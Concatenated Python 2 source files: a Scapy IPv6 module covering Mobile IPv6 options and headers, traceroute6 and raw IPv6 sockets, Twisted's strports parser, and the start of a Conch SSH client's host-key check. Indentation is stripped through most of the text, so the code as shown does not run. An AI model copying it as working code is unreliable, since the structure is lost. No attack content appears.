fields_desc = [ ByteEnumField("type", 145, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("R", 1, 1, {1: 'MR'}),
XBitField("res", 0, 15),
IP6ListField('addresses', None) ]
def hashret(self):
return struct.pack("!H",self.id)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, ICMPv6HAADRequest):
return 0
return self.id == other.id
class ICMPv6MPSol(_ICMPv6):
name = 'ICMPv6 Mobile Prefix Solicitation'
fields_desc = [ ByteEnumField("type", 146, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
XShortField("res", 0) ]
def _hashret(self):
return struct.pack("!H",self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
XBitField("res", 0, 14) ]
def hashret(self):
return struct.pack("!H",self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = { 2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)" }
class _MIP6OptAlign:
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
def alignment_delta(self, curpos):
x = self.x ; y = self.y
if x == 0 and y ==0:
return 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
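# Worked example (illustrative): MIP6OptAltCoA uses x=8, y=6 (8n+6). From
# curpos=10, alignment_delta returns 8*((10-6+8-1)/8) + 6 - 10 = 4, so after
# 4 bytes of padding the option starts at offset 14, and 14 % 8 == 6.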
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0) ]
    x = 2 ; y = 0  # alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::") ]
x = 8 ; y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0) ]
x = 2 ; y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::") ]
x = 8 ; y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY) ] # Only support ethernet
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust = lambda pkt,x: x+1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from = lambda pkt: pkt.olen-1) ]
x = 0 ; y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust = lambda pkt,x: x+5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
2: "MN-AAA authentication mobility option"}),
IntField("mspi", None),
StrLenField("authdata", "A"*12,
length_from = lambda pkt: pkt.olen-5) ]
x = 4 ; y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
epoch = (1900, 1, 1, 0, 0, 0, 5, 1, 0)
def i2repr(self, pkt, x):
if x < ((50*31536000)<<32):
return "Some date a few decades ago (%d)" % x
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
# January 1st 1970 :
delta = -2209075761
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
        import time
t = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0) ]
x = 8 ; y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign, Packet): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", '\x00'*8,
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign, Packet):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from = lambda pkt: pkt.olen) ]
x = 0 ; y = 0 # alignment requirement: none
moboptcls = { 0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest }
# Main Mobile IPv6 Classes
mhtypes = { 0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA' }
# From http://www.iana.org/assignments/mobility-parameters
bastatus = { 0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected' }
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = { IPv6: { "nh": 135 }}
def post_build(self, p, pay):
p += pay
l = self.len
if self.len is None:
l = (len(p)-8)/8
p = p[0] + struct.pack("B", l) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = p[:4]+struct.pack("!H", cksum)+p[6:]
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", "\x00"*2,
length_from = lambda pkt: 8*pkt.len-6) ]
# TODO: make a generic _OptionsField
class _MobilityOptionsField(PacketListField):
islist = 1
holds_packet = 1
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def getfield(self, pkt, s):
l = self.length_from(pkt)
return s[l:],self.m2i(pkt, s[:l])
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
def m2i(self, pkt, x):
opt = []
while x:
o = ord(x[0]) # Option type
cls = self.cls
if moboptcls.has_key(o):
cls = moboptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 8,
length_from = lambda pkt: 8*pkt.len) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value "\x00\x08\x09" (concatenation of mhtypes). This is
        # because we need to match BA with BU and BU with BRR. --arno
return "\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", "\x00"*2, 2),
StrFixedLenField("cookie", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 16,
length_from = lambda pkt: 8*(pkt.len-1)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return self.cookie
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", "\x00"*8, 8),
StrFixedLenField("token", "\x00"*8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self):
return self.cookie
    def answers(self, other):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return self.cookie
    def answers(self, other):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4*x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len - 4) ]
overload_fields = { IPv6: { "nh": 135 } }
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
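# Usage sketch (not from the original source; addresses are illustrative): a
# Binding Update carrying an Alternate Care-of Address option; the phantom
# 'autopad' field inserts the required Pad1/PadN alignment automatically:
#   IPv6(src="2001:db8::2", dst="2001:db8::1") \
#       /MIP6MH_BU(mhtime=100, options=[MIP6OptAltCoA(acoa="2001:db8::ca")])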
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_MobilityOptionsField("options", [], MIP6OptUnknown, 12,
length_from = lambda pkt: 8*pkt.len-4) ]
overload_fields = { IPv6: { "nh": 135 }}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return "\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
            other.flags & 0x1 and # the Ack request flag is set
self.seq == other.seq):
return 1
return 0
_bestatus = { 1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value' }
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes)
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_MobilityOptionsField("options", [], MIP6OptUnknown, 24,
length_from = lambda pkt: 8*(pkt.len-2)) ]
overload_fields = { IPv6: { "nh": 135 }}
_mip6_mhtype2cls = { 0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE }
#############################################################################
#############################################################################
### Traceroute6 ###
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
return ip,asn,desc
class TracerouteResult6(TracerouteResult):
def show(self):
return self.make_table(lambda (s,r): (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 !
s.hlim,
r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}"+
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}"+
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}"+
"{ICMPv6EchoReply:%ir,type%}")))
def get_trace(self):
trace = {}
for s,r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in trace.values():
m = filter(lambda x: k[x][1], k.keys())
if not m:
continue
m = min(m)
for l in k.keys():
if l > m:
del(k[l])
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4 = None, timeout=2, verbose=None, **kargs):
"""
    Instant TCP traceroute using IPv6:
    traceroute6(target, [maxttl=30], [dport=80], [sport=RandShort()]) -> (results, unanswered)
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/TCP(seq=RandInt(),sport=sport, dport=dport),
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs)
else:
a,b = sr(IPv6(dst=target, hlim=(minttl,maxttl))/l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.display()
return a,b
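# Usage sketch (host name is illustrative; requires root privileges and IPv6
# connectivity):
#   res, unans = traceroute6("www.example.com", dport=80, maxttl=20)
#   res.show()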
#############################################################################
#############################################################################
### Sockets ###
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type = ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
L3RawSocket.__init__(self, type, filter, iface, promisc)
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
def IPv6inIP(dst='192.168.127.12', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)/x)
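# Usage sketch (not from the original source; addresses are illustrative,
# requires root privileges): route IPv6 packets through an IPv6-in-IPv4
# tunnel by swapping the L3 socket class, then send as usual:
#   conf.L3socket = IPv6inIP(dst="203.0.113.1")
#   send(IPv6(dst="2001:db8::1")/ICMPv6EchoRequest())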
#############################################################################
#############################################################################
### Layers binding ###
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
bind_layers(Ether, IPv6, type = 0x86dd )
bind_layers(CookedLinux, IPv6, proto = 0x86dd )
bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP )
bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP )
bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP )
bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP )
bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 )
bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
```
#### File: twisted/application/strports.py
```python
from __future__ import generators
def _parseTCP(factory, port, interface="", backlog=50):
return (int(port), factory), {'interface': interface,
'backlog': int(backlog)}
def _parseUNIX(factory, address, mode='666', backlog=50):
return (address, factory), {'mode': int(mode, 8), 'backlog': int(backlog)}
def _parseSSL(factory, port, privateKey="server.pem", certKey=None,
sslmethod=None, interface='', backlog=50):
from twisted.internet import ssl
if certKey is None:
certKey = privateKey
kw = {}
if sslmethod is not None:
kw['sslmethod'] = getattr(ssl.SSL, sslmethod)
cf = ssl.DefaultOpenSSLContextFactory(privateKey, certKey, **kw)
return ((int(port), factory, cf),
{'interface': interface, 'backlog': int(backlog)})
_funcs = {"tcp": _parseTCP,
"unix": _parseUNIX,
"ssl": _parseSSL}
_OP, _STRING = range(2)
def _tokenize(description):
current = ''
ops = ':='
nextOps = {':': ':=', '=': ':'}
description = iter(description)
for n in description:
if n in ops:
yield _STRING, current
yield _OP, n
current = ''
ops = nextOps[n]
elif n=='\\':
current += description.next()
else:
current += n
yield _STRING, current
def _parse(description):
args, kw = [], {}
def add(sofar):
if len(sofar)==1:
args.append(sofar[0])
else:
kw[sofar[0]] = sofar[1]
sofar = ()
for (type, value) in _tokenize(description):
if type is _STRING:
sofar += (value,)
elif value==':':
add(sofar)
sofar = ()
add(sofar)
return args, kw
def parse(description, factory, default=None):
"""
Parse the description of a reliable virtual circuit server (that is, a
TCP port, a UNIX domain socket or an SSL port) and return the data
necessary to call the reactor methods to listen on the given socket with
the given factory.
An argument with no colons means a default port. Usually the default
type is C{tcp}, but passing a non-C{None} value as C{default} will set
that as the default. Otherwise, it is a colon-separated string. The
first part means the type -- currently, it can only be ssl, unix or tcp.
After that, comes a list of arguments. Arguments can be positional or
keyword, and can be mixed. Keyword arguments are indicated by
C{'name=value'}. If a value is supposed to contain a C{':'}, a C{'='} or
a C{'\\'}, escape it with a C{'\\'}.
For TCP, the arguments are the port (port number) and, optionally the
interface (interface on which to listen) and backlog (how many clients
to keep in the backlog).
For UNIX domain sockets, the arguments are address (the file name of the
socket) and optionally the mode (the mode bits of the file, as an octal
number) and the backlog (how many clients to keep in the backlog).
For SSL sockets, the arguments are the port (port number) and,
optionally, the privateKey (file in which the private key is in),
certKey (file in which the certification is in), sslmethod (the name of
the SSL method to allow), the interface (interface on which to listen)
and the backlog (how many clients to keep in the backlog).
@type description: C{str}
@type factory: L{twisted.internet.interfaces.IProtocolFactory}
@type default: C{str} or C{None}
@rtype: C{tuple}
@return: a tuple of string, tuple and dictionary. The string is the name
of the method (sans C{'listen'}) to call, and the tuple and dictionary
are the arguments and keyword arguments to the method.
@raises ValueError: if the string is formatted incorrectly.
@raises KeyError: if the type is other than unix, ssl or tcp.
"""
args, kw = _parse(description)
if not args or (len(args)==1 and not kw):
args[0:0] = [default or 'tcp']
return (args[0].upper(),)+_funcs[args[0]](factory, *args[1:], **kw)
def service(description, factory, default=None):
"""Return the service corresponding to a description
@type description: C{str}
@type factory: L{twisted.internet.interfaces.IProtocolFactory}
@type default: C{str} or C{None}
@rtype: C{twisted.application.service.IService}
@return: the service corresponding to a description of a reliable
virtual circuit server.
See the documentation of the C{parse} function for description
of the semantics of the arguments.
"""
from twisted.application import internet
name, args, kw = parse(description, factory, default)
return getattr(internet, name+'Server')(*args, **kw)
def listen(description, factory, default=None):
"""Listen on a port corresponding to a description
@type description: C{str}
@type factory: L{twisted.internet.interfaces.IProtocolFactory}
@type default: C{str} or C{None}
@rtype: C{twisted.internet.interfaces.IListeningPort}
@return: the port corresponding to a description of a reliable
virtual circuit server.
See the documentation of the C{parse} function for description
of the semantics of the arguments.
"""
from twisted.internet import reactor
name, args, kw = parse(description, factory, default)
return getattr(reactor, 'listen'+name)(*args, **kw)
__all__ = ['parse', 'service', 'listen']
```
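A short usage sketch of the description format documented in `parse` above; the `Echo` protocol and the port/interface values are assumptions for illustration only, not part of the module.
```python
# Usage sketch for the strports description strings documented above.
# Echo and the port/interface values are illustrative assumptions.
from twisted.internet import protocol, reactor
from twisted.application import strports

class Echo(protocol.Protocol):
    def dataReceived(self, data):
        self.transport.write(data)

factory = protocol.ServerFactory()
factory.protocol = Echo

# parse() only interprets the string:
# -> ('TCP', (8080, factory), {'interface': '127.0.0.1', 'backlog': 50})
print strports.parse("tcp:8080:interface=127.0.0.1", factory)

# listen() resolves the same description against the reactor:
strports.listen("tcp:8080:interface=127.0.0.1", factory)
reactor.run()
```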
#### File: conch/client/default.py
```python
from twisted.conch.error import ConchError
from twisted.conch.ssh import common, keys, userauth, agent
from twisted.internet import defer, protocol, reactor
from twisted.python import log
import agent
import os, sys, base64, getpass
def verifyHostKey(transport, host, pubKey, fingerprint):
goodKey = isInKnownHosts(host, pubKey, transport.factory.options)
if goodKey == 1: # good key
return defer.succeed(1)
elif goodKey == 2: # AAHHHHH changed
return defer.fail(ConchError('changed host key'))
else:
oldout, oldin = sys.stdout, sys.stdin
sys.stdin = sys.stdout = open('/dev/tty','r+')
if host == transport.transport.getPeer().host:
khHost = host
else:
host = '%s (%s)' % (host,
transport.transport.getPeer().host)
khHost = '%s,%s' % (host,
transport.transport.getPeer().host)
keyType = common.getNS(pubKey)[0]
print """The authenticity of host '%s' can't be established.
%s key fingerprint is %s.""" % (host,
{'ssh-dss':'DSA', 'ssh-rsa':'RSA'}[keyType],
fingerprint)
try:
ans = raw_input('Are you sure you want to continue connecting (yes/no)? ')
except KeyboardInterrupt:
return defer.fail(ConchError("^C"))
while ans.lower() not in ('yes', 'no'):
ans = raw_input("Please type 'yes' or 'no': ")
sys.stdout,sys.stdin=oldout,oldin
if ans == 'no':
print 'Host key verification failed.'
return defer.fail(ConchError('bad host key'))
print "Warning: Permanently added '%s' (%s) to the list of known hosts." % (khHost, {'ssh-dss':'DSA', 'ssh-rsa':'RSA'}[keyType])
known_hosts = open(os.path.expanduser('~/.ssh/known_hosts'), 'r+')
known_hosts.seek(-1, 2)
if known_hosts.read(1) != '\n':
known_hosts.write('\n')
encodedKey = base64.encodestring(pubKey).replace('\n', '')
known_hosts.write('%s %s %s\n' % (khHost, keyType, encodedKey))
known_hosts.close()
return defer.succeed(1)
def isInKnownHosts(host, pubKey, options):
"""checks to see if host is in the known_hosts file for the user.
returns 0 if it isn't, 1 if it is and is the same, 2 if it's changed.
"""
keyType = common.getNS(pubKey)[0]
